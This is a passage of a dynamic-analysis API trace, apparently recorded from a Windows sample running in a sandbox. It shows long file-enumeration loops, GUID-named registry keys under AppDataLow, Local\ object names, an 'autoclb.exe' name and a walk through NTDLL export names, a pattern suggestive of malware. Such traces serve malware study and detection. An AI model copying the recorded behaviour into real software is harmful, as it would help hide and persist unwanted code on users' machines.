lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.369] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.369] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.369] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.369] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.369] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.370] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.370] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.370] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.370] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.370] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.370] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.370] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.370] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.370] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.370] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.370] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.370] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.370] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.370] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.370] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.370] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.370] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.370] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.370] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.370] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.370] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.370] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.370] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.370] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.370] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.370] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.370] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.370] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.370] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.370] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.370] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.370] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.370] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.370] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.370] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.370] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.371] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.371] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.371] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.371] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.371] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.371] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.371] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.371] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.371] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.371] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.371] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.371] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.371] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.371] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.371] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.371] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.371] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.371] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.371] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.371] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.371] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.371] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.371] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.371] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.371] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.371] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.371] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.371] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.371] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.371] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.371] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.371] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.371] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.371] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.371] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.371] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.371] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.371] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.371] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.371] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.372] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.372] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.372] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.372] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.372] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.372] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.372] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.372] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.372] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.372] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.372] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.372] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.372] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.372] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.372] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.372] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.372] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.372] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.372] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.372] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.372] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.372] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.372] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.372] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.372] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.372] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.372] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.372] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.372] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.372] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.372] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.372] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.372] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.372] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.372] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.372] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.373] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.373] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.373] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.373] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.373] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.373] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.373] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.373] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.373] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.373] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.373] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.373] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.373] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.373] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.373] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.373] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.373] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.373] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.373] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.373] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.373] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.373] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.373] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.373] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.373] StrChrA (lpStart="ddraw.dll", wMatch=0x2e) returned=".dll" [0055.375] lstrlenA (lpString="adsldraw") returned 8 [0055.375] mbstowcs (in: _Dest=0x2358750, _Source="adsldraw", _MaxCount=0xe | out: _Dest="adsldraw") returned 0x8 [0055.375] lstrcatW (in: lpString1="autoclb", lpString2=".exe" | out: lpString1="autoclb.exe") returned="autoclb.exe" [0055.375] wsprintfA (in: param_1=0x2358778, param_2="%08X-%04X-%04X-%04X-%08X%04X" | out: param_1="667F6611-8D0F-88EB-47FA-113C6BCED530") returned 36 [0055.375] lstrlenA (lpString="Software\\AppDataLow\\Software\\Microsoft\\") returned 39 [0055.375] lstrcpyA (in: lpString1=0x2358a38, lpString2="Software\\AppDataLow\\Software\\Microsoft\\" | out: lpString1="Software\\AppDataLow\\Software\\Microsoft\\") returned="Software\\AppDataLow\\Software\\Microsoft\\" [0055.375] lstrcatA (in: lpString1="Software\\AppDataLow\\Software\\Microsoft\\", lpString2="667F6611-8D0F-88EB-47FA-113C6BCED530" | out: lpString1="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530") returned="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530" [0055.375] wsprintfA (in: param_1=0x2358778, param_2="{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="{2F87B751-C28A-394B-44D3-167DB8B7AA01}") returned 38 [0055.375] lstrlenA (lpString="Local\\") returned 6 [0055.375] lstrcpyA (in: lpString1=0x2358a90, lpString2="Local\\" | out: lpString1="Local\\") returned="Local\\" [0055.375] lstrcatA (in: lpString1="Local\\", lpString2="{2F87B751-C28A-394B-44D3-167DB8B7AA01}" | out: lpString1="Local\\{2F87B751-C28A-394B-44D3-167DB8B7AA01}") returned="Local\\{2F87B751-C28A-394B-44D3-167DB8B7AA01}" [0055.375] wsprintfA (in: param_1=0x2358778, param_2="{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="{6C433A47-DB67-7E7B-C560-3F92C994E3E6}") returned 38 [0055.375] lstrcatA (in: lpString1="", lpString2="{6C433A47-DB67-7E7B-C560-3F92C994E3E6}" | out: lpString1="{6C433A47-DB67-7E7B-C560-3F92C994E3E6}") returned="{6C433A47-DB67-7E7B-C560-3F92C994E3E6}" [0055.375] wsprintfA (in: param_1=0x2358778, param_2="{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="{0D65F8EA-0843-C78A-7A91-BCEB4E55B04F}") returned 38 [0055.375] lstrlenA (lpString="Local\\") returned 6 [0055.376] lstrcpyA (in: lpString1=0x2358af8, lpString2="Local\\" | out: lpString1="Local\\") returned="Local\\" [0055.376] lstrcatA (in: lpString1="Local\\", lpString2="{0D65F8EA-0843-C78A-7A91-BCEB4E55B04F}" | out: lpString1="Local\\{0D65F8EA-0843-C78A-7A91-BCEB4E55B04F}") returned="Local\\{0D65F8EA-0843-C78A-7A91-BCEB4E55B04F}" [0055.376] GetModuleHandleA (lpModuleName="NTDLL.DLL") returned 0x77ca0000 [0055.376] lstrlenA (lpString="A_SHAFinal") returned 10 [0055.376] lstrlenA (lpString="A_SHAInit") returned 9 [0055.376] lstrlenA (lpString="A_SHAUpdate") returned 11 [0055.376] lstrlenA (lpString="AlpcAdjustCompletionListConcurrencyCount") returned 40 [0055.376] lstrlenA (lpString="AlpcFreeCompletionListMessage") returned 29 [0055.376] lstrlenA (lpString="AlpcGetCompletionListLastMessageInformation") returned 43 [0055.376] lstrlenA (lpString="AlpcGetCompletionListMessageAttributes") returned 38 [0055.376] lstrlenA (lpString="AlpcGetHeaderSize") returned 17 [0055.376] lstrlenA (lpString="AlpcGetMessageAttribute") returned 23 [0055.376] lstrlenA (lpString="AlpcGetMessageFromCompletionList") returned 32 [0055.376] lstrlenA (lpString="AlpcGetOutstandingCompletionListMessageCount") returned 44 [0055.376] lstrlenA (lpString="AlpcInitializeMessageAttribute") returned 30 [0055.376] lstrlenA (lpString="AlpcMaxAllowedMessageLength") returned 27 [0055.376] lstrlenA (lpString="AlpcRegisterCompletionList") returned 26 [0055.376] lstrlenA (lpString="AlpcRegisterCompletionListWorkerThread") returned 38 [0055.376] lstrlenA (lpString="AlpcRundownCompletionList") returned 25 [0055.376] lstrlenA (lpString="AlpcUnregisterCompletionList") returned 28 [0055.376] lstrlenA (lpString="AlpcUnregisterCompletionListWorkerThread") returned 40 [0055.376] lstrlenA (lpString="ApiSetQueryApiSetPresence") returned 25 [0055.376] lstrlenA (lpString="CsrAllocateCaptureBuffer") returned 24 [0055.376] lstrlenA (lpString="CsrAllocateMessagePointer") returned 25 [0055.376] lstrlenA (lpString="CsrCaptureMessageBuffer") returned 23 [0055.376] lstrlenA (lpString="CsrCaptureMessageMultiUnicodeStringsInPlace") returned 43 [0055.376] lstrlenA (lpString="CsrCaptureMessageString") returned 23 [0055.376] lstrlenA (lpString="CsrCaptureTimeout") returned 17 [0055.377] lstrlenA (lpString="CsrClientCallServer") returned 19 [0055.377] lstrlenA (lpString="CsrClientConnectToServer") returned 24 [0055.377] lstrlenA (lpString="CsrFreeCaptureBuffer") returned 20 [0055.377] lstrlenA (lpString="CsrGetProcessId") returned 15 [0055.377] lstrlenA (lpString="CsrIdentifyAlertableThread") returned 26 [0055.377] lstrlenA (lpString="CsrSetPriorityClass") returned 19 [0055.377] lstrlenA (lpString="CsrVerifyRegion") returned 15 [0055.377] lstrlenA (lpString="DbgBreakPoint") returned 13 [0055.377] lstrlenA (lpString="DbgPrint") returned 8 [0055.377] lstrlenA (lpString="DbgPrintEx") returned 10 [0055.377] lstrlenA (lpString="DbgPrintReturnControlC") returned 22 [0055.377] lstrlenA (lpString="DbgPrompt") returned 9 [0055.377] lstrlenA (lpString="DbgQueryDebugFilterState") returned 24 [0055.377] lstrlenA (lpString="DbgSetDebugFilterState") returned 22 [0055.377] lstrlenA (lpString="DbgUiConnectToDbg") returned 17 [0055.377] lstrlenA (lpString="DbgUiContinue") returned 13 [0055.377] lstrlenA (lpString="DbgUiConvertStateChangeStructure") returned 32 [0055.377] lstrlenA (lpString="DbgUiConvertStateChangeStructureEx") returned 34 [0055.377] lstrlenA (lpString="DbgUiDebugActiveProcess") returned 23 [0055.377] lstrlenA (lpString="DbgUiGetThreadDebugObject") returned 25 [0055.377] lstrlenA (lpString="DbgUiIssueRemoteBreakin") returned 23 [0055.377] lstrlenA (lpString="DbgUiRemoteBreakin") returned 18 [0055.377] lstrlenA (lpString="DbgUiSetThreadDebugObject") returned 25 [0055.377] lstrlenA (lpString="DbgUiStopDebugging") returned 18 [0055.377] lstrlenA (lpString="DbgUiWaitStateChange") returned 20 [0055.377] lstrlenA (lpString="DbgUserBreakPoint") returned 17 [0055.377] lstrlenA (lpString="EtwCreateTraceInstanceId") returned 24 [0055.377] lstrlenA (lpString="EtwDeliverDataBlock") returned 19 [0055.377] lstrlenA (lpString="EtwEnumerateProcessRegGuids") returned 27 [0055.377] lstrlenA (lpString="EtwEventActivityIdControl") returned 25 [0055.377] lstrlenA (lpString="EtwEventEnabled") returned 15 [0055.377] lstrlenA (lpString="EtwEventProviderEnabled") returned 23 [0055.377] lstrlenA (lpString="EtwEventRegister") returned 16 [0055.377] lstrlenA (lpString="EtwEventSetInformation") returned 22 [0055.378] lstrlenA (lpString="EtwEventUnregister") returned 18 [0055.378] lstrlenA (lpString="EtwEventWrite") returned 13 [0055.378] lstrlenA (lpString="EtwEventWriteEndScenario") returned 24 [0055.378] lstrlenA (lpString="EtwEventWriteEx") returned 15 [0055.378] lstrlenA (lpString="EtwEventWriteFull") returned 17 [0055.378] lstrlenA (lpString="EtwEventWriteNoRegistration") returned 27 [0055.378] lstrlenA (lpString="EtwEventWriteStartScenario") returned 26 [0055.378] lstrlenA (lpString="EtwEventWriteString") returned 19 [0055.378] lstrlenA (lpString="EtwEventWriteTransfer") returned 21 [0055.378] lstrlenA (lpString="EtwGetTraceEnableFlags") returned 22 [0055.378] lstrlenA (lpString="EtwGetTraceEnableLevel") returned 22 [0055.378] lstrlenA (lpString="EtwGetTraceLoggerHandle") returned 23 [0055.378] lstrlenA (lpString="EtwLogTraceEvent") returned 16 [0055.378] lstrlenA (lpString="EtwNotificationRegister") returned 23 [0055.378] lstrlenA (lpString="EtwNotificationUnregister") returned 25 [0055.378] lstrlenA (lpString="EtwProcessPrivateLoggerRequest") returned 30 [0055.378] lstrlenA (lpString="EtwRegisterSecurityProvider") returned 27 [0055.378] lstrlenA (lpString="EtwRegisterTraceGuidsA") returned 22 [0055.378] lstrlenA (lpString="EtwRegisterTraceGuidsW") returned 22 [0055.378] lstrlenA (lpString="EtwReplyNotification") returned 20 [0055.378] lstrlenA (lpString="EtwSendNotification") returned 19 [0055.378] lstrlenA (lpString="EtwSetMark") returned 10 [0055.378] lstrlenA (lpString="EtwTraceEventInstance") returned 21 [0055.378] lstrlenA (lpString="EtwTraceMessage") returned 15 [0055.378] lstrlenA (lpString="EtwTraceMessageVa") returned 17 [0055.378] lstrlenA (lpString="EtwUnregisterTraceGuids") returned 23 [0055.378] lstrlenA (lpString="EtwWriteUMSecurityEvent") returned 23 [0055.378] lstrlenA (lpString="EtwpCreateEtwThread") returned 19 [0055.378] lstrlenA (lpString="EtwpGetCpuSpeed") returned 15 [0055.378] lstrlenA (lpString="EvtIntReportAuthzEventAndSourceAsync") returned 36 [0055.378] lstrlenA (lpString="EvtIntReportEventAndSourceAsync") returned 31 [0055.378] lstrlenA (lpString="ExpInterlockedPopEntrySListEnd") returned 30 [0055.378] lstrlenA (lpString="ExpInterlockedPopEntrySListFault") returned 32 [0055.378] lstrlenA (lpString="ExpInterlockedPopEntrySListResume") returned 33 [0055.379] lstrlenA (lpString="KiFastSystemCall") returned 16 [0055.379] lstrlenA (lpString="KiFastSystemCallRet") returned 19 [0055.379] lstrlenA (lpString="KiIntSystemCall") returned 15 [0055.379] lstrlenA (lpString="KiRaiseUserExceptionDispatcher") returned 30 [0055.379] lstrlenA (lpString="KiUserApcDispatcher") returned 19 [0055.379] lstrlenA (lpString="KiUserCallbackDispatcher") returned 24 [0055.379] lstrlenA (lpString="KiUserExceptionDispatcher") returned 25 [0055.379] lstrlenA (lpString="LdrAccessResource") returned 17 [0055.379] lstrlenA (lpString="LdrAddDllDirectory") returned 18 [0055.379] lstrlenA (lpString="LdrAddLoadAsDataTable") returned 21 [0055.379] lstrlenA (lpString="LdrAddRefDll") returned 12 [0055.379] lstrlenA (lpString="LdrAppxHandleIntegrityFailure") returned 29 [0055.379] lstrlenA (lpString="LdrDisableThreadCalloutsForDll") returned 30 [0055.379] lstrlenA (lpString="LdrEnumResources") returned 16 [0055.379] lstrlenA (lpString="LdrEnumerateLoadedModules") returned 25 [0055.379] lstrlenA (lpString="LdrFastFailInLoaderCallout") returned 26 [0055.379] lstrlenA (lpString="LdrFindEntryForAddress") returned 22 [0055.379] lstrlenA (lpString="LdrFindResourceDirectory_U") returned 26 [0055.379] lstrlenA (lpString="LdrFindResourceEx_U") returned 19 [0055.379] lstrlenA (lpString="LdrFindResource_U") returned 17 [0055.379] lstrlenA (lpString="LdrFlushAlternateResourceModules") returned 32 [0055.379] lstrlenA (lpString="LdrGetDllDirectory") returned 18 [0055.379] lstrlenA (lpString="LdrGetDllFullName") returned 17 [0055.379] lstrlenA (lpString="LdrGetDllHandle") returned 15 [0055.379] lstrlenA (lpString="LdrGetDllHandleByMapping") returned 24 [0055.379] lstrlenA (lpString="LdrGetDllHandleByName") returned 21 [0055.379] lstrlenA (lpString="LdrGetDllHandleEx") returned 17 [0055.379] lstrlenA (lpString="LdrGetDllPath") returned 13 [0055.379] lstrlenA (lpString="LdrGetFailureData") returned 17 [0055.379] lstrlenA (lpString="LdrGetFileNameFromLoadAsDataTable") returned 33 [0055.379] lstrlenA (lpString="LdrGetProcedureAddress") returned 22 [0055.379] lstrlenA (lpString="LdrGetProcedureAddressEx") returned 24 [0055.379] lstrlenA (lpString="LdrGetProcedureAddressForCaller") returned 31 [0055.380] lstrlenA (lpString="LdrInitShimEngineDynamic") returned 24 [0055.380] lstrlenA (lpString="LdrInitializeThunk") returned 18 [0055.380] lstrlenA (lpString="LdrLoadAlternateResourceModule") returned 30 [0055.380] lstrlenA (lpString="LdrLoadAlternateResourceModuleEx") returned 32 [0055.380] lstrlenA (lpString="LdrLoadDll") returned 10 [0055.380] lstrlenA (lpString="LdrLockLoaderLock") returned 17 [0055.380] lstrlenA 